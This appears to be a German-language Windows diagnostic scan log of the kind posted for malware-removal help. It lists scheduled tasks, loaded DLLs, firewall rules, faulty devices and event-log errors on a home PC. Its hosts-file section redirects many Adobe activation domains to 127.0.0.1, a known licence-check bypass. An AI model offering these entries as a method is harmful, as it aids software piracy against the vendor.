Task: {C61C6295-3FA7-43FE-8A97-A41503664FF1} - System32\Tasks\{76A2D95E-7B3C-41FD-B8E2-209053DBD3C0} => pcalua.exe -a "C:\Users\Ben\Downloads\32507\CM6206最新驱动 1009\USB-106-081014-12.8.2111(Full-LO-01)_1016\Setup.exe" -d "C:\Users\Ben\Downloads\32507\CM6206最新驱动 1009\USB-106-081014-12.8.2111(Full-LO-01)_1016"
Task: {E196A98F-38A4-49E5-958B-6CFEFAFFB8BD} - System32\Tasks\{AE712D40-D949-47B4-8608-487122F4C8DA} => pcalua.exe -a C:\Users\Ben\Downloads\32507\1623\UAExtInstall.exe -d C:\Users\Ben\Downloads\32507\1623
Task: {F71D1A64-746E-4CEE-A905-6036D8B0BCDE} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2015-04-10] (Samsung Electronics.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000Core.job => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1744302370-2936264581-3152195107-1000UA.job => C:\Users\Ben\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-07-28 22:45 - 2015-07-28 22:45 - 00214528 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.PerformanceTuning.dll
2014-02-11 07:08 - 2014-02-11 07:08 - 00817152 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Device.dll
2014-02-11 07:08 - 2014-02-11 07:08 - 03650560 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Platform.dll
2015-07-28 22:45 - 2015-07-28 22:45 - 00127488 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2012-02-08 21:58 - 2011-05-19 10:58 - 00246784 _____ () C:\Windows\SYSTEM32\APOMgr64.DLL
2011-07-29 01:08 - 2011-07-29 01:08 - 01259376 _____ () C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
2015-07-28 22:45 - 2015-07-28 22:45 - 00102400 _____ () C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2012-02-20 22:29 - 2012-02-20 22:29 - 00087912 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-02-20 22:28 - 2012-02-20 22:28 - 01242472 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2015-07-29 16:07 - 2015-04-10 14:33 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2015-09-03 16:02 - 2016-03-11 02:56 - 00783360 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-09-03 16:02 - 2015-07-03 18:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-09-03 16:02 - 2015-07-03 18:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-09-03 16:02 - 2015-07-03 18:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2015-09-03 16:02 - 2016-03-31 22:55 - 02549840 _____ () C:\Program Files (x86)\Steam\video.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2015-09-03 16:02 - 2016-02-09 01:14 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2015-09-03 16:02 - 2016-03-31 22:55 - 00829008 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2016-03-13 14:29 - 2016-02-18 00:25 - 00281088 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2012-02-08 21:58 - 2011-05-04 17:32 - 00094208 ____N () C:\Program Files (x86)\Creative\THX TruStudio\THXNBSet\de-DE\THXAudNB.resources.dll
2011-07-29 01:09 - 2011-07-29 01:09 - 00096112 _____ () C:\Program Files (x86)\DivX\DivX Update\DivXUpdateCheck.dll
2011-01-17 17:19 - 2012-03-16 13:44 - 00985088 _____ () C:\Program Files (x86)\OpenOffice.org 3\program\libxml2.dll
2015-09-15 20:53 - 2013-07-24 09:24 - 00137728 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
2015-09-15 20:53 - 2014-02-15 11:48 - 00295936 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
2016-03-30 22:27 - 2016-03-27 09:58 - 01675928 _____ () C:\Users\Ben\AppData\Local\Google\Chrome\Application\49.0.2623.110\libglesv2.dll
2016-03-30 22:27 - 2016-03-27 09:58 - 00086168 _____ () C:\Users\Ben\AppData\Local\Google\Chrome\Application\49.0.2623.110\libegl.dll
2015-09-03 16:02 - 2016-02-09 03:33 - 48400672 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2012-05-06 21:08 - 00002056 ___RA C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 adobe.com 
127.0.0.1 activate.adobe.com 
127.0.0.1 hl2rcv.adobe.com 
127.0.0.1 adobeereg.com 
127.0.0.1 activate.adobe.com 
127.0.0.1 practivate.adobe.com 
127.0.0.1 ereg.adobe.com 
127.0.0.1 activate.wip3.adobe.com 
127.0.0.1 ereg.wip3.adobe.com 
127.0.0.1 wip3.adobe.com 
127.0.0.1 activate-sea.adobe.com 
127.0.0.1 wwis-dubc1-vip60.adobe.com 
127.0.0.1 activate-sjc0.adobe.com 
127.0.0.1 3dns.adobe.com 
127.0.0.1 3dns-1.adobe.com 
127.0.0.1 3dns-2.adobe.com 
127.0.0.1 3dns-3.adobe.com 
127.0.0.1 3dns-4.adobe.com 
127.0.0.1 adobe-dns.adobe.com 
127.0.0.1 adobe-dns-1.adobe.com 
127.0.0.1 adobe-dns-2.adobe.com 
127.0.0.1 adobe-dns-3.adobe.com 
127.0.0.1 adobe-dns-4.adobe.com 
127.0.0.1 adobe-dns-5.adobe.com 
127.0.0.1 activate.adobe.com 
127.0.0.1 practivate.adobe.com 
127.0.0.1 ereg.adobe.com 
127.0.0.1 activate.wip3.adobe.com 
127.0.0.1 wip3.adobe.com 
127.0.0.1 3dns-3.adobe.com 

Da befinden sich 8 zusätzliche Einträge.


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{356960C4-500B-4675-AC52-5EC567DE34DD}C:\program files (x86)\jdownloader\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\jdownloader\jre\bin\javaw.exe
FirewallRules: [UDP Query User{36F91D86-EC5E-4DBE-8B88-B1CE12731C68}C:\program files (x86)\jdownloader\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\jdownloader\jre\bin\javaw.exe
FirewallRules: [{0E1B7C89-3B91-4CEC-8AF5-6162532341D8}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty - World at War\CoDWaW.exe
FirewallRules: [{78D12809-FF2A-4DDA-ACC1-BB2875797533}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty - World at War\CoDWaW.exe
FirewallRules: [{1EDE5150-BCA2-4A6B-9189-B2D00ED3DF29}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty - World at War\CoDWaWmp.exe
FirewallRules: [{8A77EBE2-DE96-4340-8071-67F7F3E18800}] => (Allow) C:\Program Files (x86)\Activision\Call of Duty - World at War\CoDWaWmp.exe
FirewallRules: [{D54DC70A-E7FB-4A0F-B820-218AE77BBB26}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin32\Crysis.exe
FirewallRules: [{B0B13C14-79F5-4B10-9199-C10CB3EA44DF}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin32\Crysis.exe
FirewallRules: [{2F3EF107-2B35-40E2-BEA5-0B63D217242F}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin32\CrysisDedicatedServer.exe
FirewallRules: [{D4316832-15E7-4DF7-831A-9FC6A198495E}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin32\CrysisDedicatedServer.exe
FirewallRules: [{CA850DC0-E1AB-48CB-952A-F72B138057BD}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin64\Crysis.exe
FirewallRules: [{47C2174A-59B6-47F9-97EE-3730FEAF2C30}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin64\Crysis.exe
FirewallRules: [{E6543618-5674-498C-B7E2-8EA1C8508635}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin64\CrysisDedicatedServer.exe
FirewallRules: [{CADE791C-CB47-41AE-8FBD-03713BD312D6}] => (Allow) C:\Program Files (x86)\Electronic Arts\Crytek\Crysis\Bin64\CrysisDedicatedServer.exe
FirewallRules: [TCP Query User{7E460BB6-26AF-455B-A94E-0A8F44717B76}C:\program files (x86)\activision\call of duty - world at war\codwaw.exe] => (Allow) C:\program files (x86)\activision\call of duty - world at war\codwaw.exe
FirewallRules: [UDP Query User{1079E0A7-3AF3-42CE-AA6A-7DFF93D94AA3}C:\program files (x86)\activision\call of duty - world at war\codwaw.exe] => (Allow) C:\program files (x86)\activision\call of duty - world at war\codwaw.exe
FirewallRules: [{DC316397-F7A0-4AC4-82AB-D6079F0A5283}] => (Allow) LPort=8394
FirewallRules: [{0EAA178A-654B-4B70-BD93-6B1F8BFE1979}] => (Allow) LPort=8394
FirewallRules: [{730F6875-1ACD-475B-8562-52B289B80E5E}] => (Allow) C:\Program Files (x86)\League of Legends\Air\LolClient.exe
FirewallRules: [{0605D376-745B-4914-ABB6-C1134CFDADC7}] => (Allow) C:\Program Files (x86)\League of Legends\Air\LolClient.exe
FirewallRules: [{5D456382-629C-42A8-9A18-65E9A65CF3A6}] => (Allow) C:\Program Files (x86)\League of Legends\Game\League of Legends.exe
FirewallRules: [{B9B5CDE4-1AD0-4C05-A5C6-C07E8C1675F9}] => (Allow) C:\Program Files (x86)\League of Legends\Game\League of Legends.exe
FirewallRules: [{CC9CC49D-934B-42A6-9650-6762C986BF15}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{2F2188D2-D2C7-4559-8FCA-714F9C5746B1}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{2A91C63D-DB84-4F17-BEF2-2D85659558D6}] => (Allow) C:\Users\Ben\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [{F702D92A-178E-4A75-927B-2C26CBFF4ED2}] => (Allow) C:\Users\Ben\AppData\Roaming\Spotify\spotify.exe
FirewallRules: [TCP Query User{F13405BF-147F-4C5E-B94C-1A490D5074CE}C:\program files (x86)\jdownloader\jre\bin\javaw.exe] => (Block) C:\program files (x86)\jdownloader\jre\bin\javaw.exe
FirewallRules: [UDP Query User{B486CD33-24A5-4633-AAB2-499E1AB19AA0}C:\program files (x86)\jdownloader\jre\bin\javaw.exe] => (Block) C:\program files (x86)\jdownloader\jre\bin\javaw.exe
FirewallRules: [TCP Query User{D9939FE3-8B1E-4E7D-8644-AAF5E62DEDC5}C:\program files (x86)\ea sports\fifa 11\game\fifa.exe] => (Allow) C:\program files (x86)\ea sports\fifa 11\game\fifa.exe
FirewallRules: [UDP Query User{13A6BFEA-918C-4ED6-B77A-AF252271D5B6}C:\program files (x86)\ea sports\fifa 11\game\fifa.exe] => (Allow) C:\program files (x86)\ea sports\fifa 11\game\fifa.exe
FirewallRules: [{644C8EA5-96D7-4197-9C40-5BC386020BA2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{9928D1DF-61BB-49B4-9392-C075EEC28365}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4D728EA4-73E2-473D-A9EC-70FCAED77821}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{E9C634F6-DADB-40B9-93B8-892E8FC702B9}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{C001F917-B0DD-45E2-9A94-611CD9C24D5D}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{8A89ADEF-649D-49E6-94E6-170293CE530E}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [TCP Query User{E5C8FBFC-8C74-421F-AD18-D769C6626D6F}C:\users\ben\appdata\local\jdownloader v2.0\jdownloader2.exe] => (Allow) C:\users\ben\appdata\local\jdownloader v2.0\jdownloader2.exe
FirewallRules: [UDP Query User{CDE753D0-E7C1-4494-A0AC-19737DFD3937}C:\users\ben\appdata\local\jdownloader v2.0\jdownloader2.exe] => (Allow) C:\users\ben\appdata\local\jdownloader v2.0\jdownloader2.exe
FirewallRules: [{297E7E42-D6CF-4AD3-952F-7005DAC344DB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{B6870EAE-243E-4395-9D12-66FED13A84A4}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E3BAC2E3-BC77-4CB6-ABCF-454F84491898}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{80829A3C-B092-4637-8E43-F54A5C065E38}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{97434516-7FA0-429A-8B31-785D0AA4C79E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1869DE39-FDF8-4554-A26C-607A7D80C2BB}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A83DCAB6-A357-42A7-B79F-972533FA6125}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{43679186-01A6-4963-BAB0-3FB0F250603E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{94571175-1E14-44D6-B1D7-EC47F6508AF1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal\hl2.exe
FirewallRules: [{E7E3A141-79E4-4C46-BDC8-EAB0EB9FC0C1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal\hl2.exe
FirewallRules: [{34249524-CAB6-4750-B4B8-9EBE36522EFA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe
FirewallRules: [{6B312E69-327A-434F-B6DC-998DF0672BB1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe
FirewallRules: [{BE8276C7-55CC-43C1-8A6E-34D4B616AA52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\left 4 dead\left4dead.exe
FirewallRules: [{5EAAD74F-E587-4D09-B1B5-ED660F327CDC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\left 4 dead\left4dead.exe
FirewallRules: [{E5926AF7-D748-43E6-9A44-9A22D250C0F4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Jackbox Party Pack\TJPP.exe
FirewallRules: [{69ABCDE4-09A7-41A7-AE34-C83032BCE96A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Jackbox Party Pack\TJPP.exe
FirewallRules: [TCP Query User{B1213675-00B9-4511-B42C-4FF9CF5AF4A8}C:\users\ben\downloads\scrpmchnc\scrap mechanic\scrap mechanic\scrap mechanic\release\scrapmechanic.exe] => (Allow) C:\users\ben\downloads\scrpmchnc\scrap mechanic\scrap mechanic\scrap mechanic\release\scrapmechanic.exe
FirewallRules: [UDP Query User{FEA81054-BBA0-4468-BC76-7D2F6F1AC45D}C:\users\ben\downloads\scrpmchnc\scrap mechanic\scrap mechanic\scrap mechanic\release\scrapmechanic.exe] => (Allow) C:\users\ben\downloads\scrpmchnc\scrap mechanic\scrap mechanic\scrap mechanic\release\scrapmechanic.exe
FirewallRules: [TCP Query User{BBC82F50-0C7B-49B5-BEAC-1E23300A8E54}C:\users\ben\downloads\sm-0 1\scrap mechanic\release\scrapmechanic.exe] => (Block) C:\users\ben\downloads\sm-0 1\scrap mechanic\release\scrapmechanic.exe
FirewallRules: [UDP Query User{AD912FB0-C293-41DB-963B-74F1D5D8E70D}C:\users\ben\downloads\sm-0 1\scrap mechanic\release\scrapmechanic.exe] => (Block) C:\users\ben\downloads\sm-0 1\scrap mechanic\release\scrapmechanic.exe
FirewallRules: [{9294F9AA-87DE-4D16-AE90-508E07314375}] => (Allow) C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

09-04-2016 15:58:56 Revo Uninstaller's restore point - Pro Evolution Soccer 2011

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: AODDriver4.01
Description: AODDriver4.01
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: AODDriver4.01
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/09/2016 04:23:59 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2016 03:47:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/09/2016 03:21:07 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (04/03/2016 01:34:00 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Avira.ServiceHost.exe, Version: 1.1.56.9119, Zeitstempel: 0x56a8ea7a
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7601.19135, Zeitstempel: 0x56a1c79e
Ausnahmecode: 0xe0434352
Fehleroffset: 0x0000c52f
ID des fehlerhaften Prozesses: 0x1e6c
Startzeit der fehlerhaften Anwendung: 0xAvira.ServiceHost.exe0
Pfad der fehlerhaften Anwendung: Avira.ServiceHost.exe1
Pfad des fehlerhaften Moduls: Avira.ServiceHost.exe2
Berichtskennung: Avira.ServiceHost.exe3

Error: (03/21/2016 03:20:24 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Avira.ServiceHost.exe, Version: 1.1.54.24924, Zeitstempel: 0x568bd859
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7601.19135, Zeitstempel: 0x56a1c79e
Ausnahmecode: 0xe0434352
Fehleroffset: 0x0000c52f
ID des fehlerhaften Prozesses: 0x680
Startzeit der fehlerhaften Anwendung: 0xAvira.ServiceHost.exe0
Pfad der fehlerhaften Anwendung: Avira.ServiceHost.exe1
Pfad des fehlerhaften Moduls: Avira.ServiceHost.exe2
Berichtskennung: Avira.ServiceHost.exe3

Error: (03/21/2016 03:20:23 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: Avira.ServiceHost.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.OutOfMemoryException
   bei NLog.Targets.FileTarget.SequentialArchive(System.String, System.String)
   bei NLog.Targets.FileTarget.DoAutoArchive(System.String, NLog.LogEventInfo)
   bei NLog.Targets.FileTarget.Write(NLog.LogEventInfo)
   bei NLog.Targets.Target.Write(NLog.Common.AsyncLogEventInfo)
   bei NLog.Targets.Target.WriteAsyncLogEvent(NLog.Common.AsyncLogEventInfo)
   bei NLog.LoggerImpl.WriteToTargetWithFilterChain(NLog.Internal.TargetWithFilterChain, NLog.LogEventInfo, NLog.Common.AsyncContinuation)
   bei NLog.LoggerImpl.Write(System.Type, NLog.Internal.TargetWithFilterChain, NLog.LogEventInfo, NLog.LogFactory)
   bei NLog.Logger.WriteToTargets(NLog.LogEventInfo)
   bei NLog.Logger.Log(NLog.LogEventInfo)
   bei Avira.OE.WinCore.Utility.LoggerFacade.Log(NLog.LogLevel, System.String, System.Object[], System.Exception)
   bei Avira.OE.WinCore.Utility.LoggerFacade.Debug(System.String, System.Object[])
   bei Avira.OE.AvConnector.AvFileMonitor.FileWatcher_Changed(System.Object, System.IO.FileSystemEventArgs)
   bei System.IO.FileSystemWatcher.OnChanged(System.IO.FileSystemEventArgs)
   bei System.IO.FileSystemWatcher.NotifyFileSystemEventArgs(Int32, System.String)
   bei System.IO.FileSystemWatcher.CompletionStatusChanged(UInt32, UInt32, System.Threading.NativeOverlapped*)
   bei System.Threading._IOCompletionCallback.PerformIOCompletionCallback(UInt32, UInt32, System.Threading.NativeOverlapped*)

Error: (03/09/2016 03:06:24 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: vlc.exe, Version: 2.2.1.0, Zeitstempel: 0x00000004
Name des fehlerhaften Moduls: libqt4_plugin.dll, Version: 2.2.1.0, Zeitstempel: 0x00020002
Ausnahmecode: 0x40000015
Fehleroffset: 0x007ca10a
ID des fehlerhaften Prozesses: 0x1a4c
Startzeit der fehlerhaften Anwendung: 0xvlc.exe0
Pfad der fehlerhaften Anwendung: vlc.exe1
Pfad des fehlerhaften Moduls: vlc.exe2
Berichtskennung: vlc.exe3

Error: (03/07/2016 02:58:36 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (03/06/2016 09:04:44 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (02/21/2016 02:34:59 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ScrapMechanic.exe, Version 0.0.0.0 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2ae0

Startzeit: 01d16c3f8a1dade5

Endzeit: 4

Anwendungspfad: C:\Users\Ben\Downloads\ScrpMchnc\Scrap Mechanic\Scrap Mechanic\Scrap Mechanic\Release\ScrapMechanic.exe

Berichts-ID: d3d24b08-d832-11e5-8a2e-002522ff397d


Systemfehler:
=============
Error: (04/09/2016 05:36:39 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (04/09/2016 05:18:37 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (04/09/2016 05:03:36 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (04/09/2016 05:00:36 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (04/09/2016 04:27:58 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Der Dienst "Windows Search" wurde nicht richtig gestartet.

Error: (04/09/2016 04:24:32 PM) (Source: bowser) (EventID: 8003) (User: )
Description: Der Hauptsuchdienst erhielt eine Serverankündigung vom Computer "EASYBOX",
der der Hauptsuchdienst der Domäne für den NetBT_Tcpip_{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}-Transport zu sein scheint.
Der Hauptsuchdienst wurde beendet oder es wird eine Auswahl erzwungen.

Error: (04/09/2016 04:23:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "AODDriver4.01" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3

Error: (04/09/2016 03:45:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "AODDriver4.01" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3

Error: (04/09/2016 03:19:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "AODDriver4.01" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%3

Error: (04/09/2016 03:18:17 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: 
%%1056


CodeIntegrity:
===================================
  Date: 2015-09-14 19:19:01.425
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\SSD\Windows\WinSxS\x86_microsoft-windows-cloudstoragewizard_31bf3856ad364e35_6.3.9600.17415_none_895a2497a8f7a9b7\CloudStorageWizard.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-14 19:19:01.314
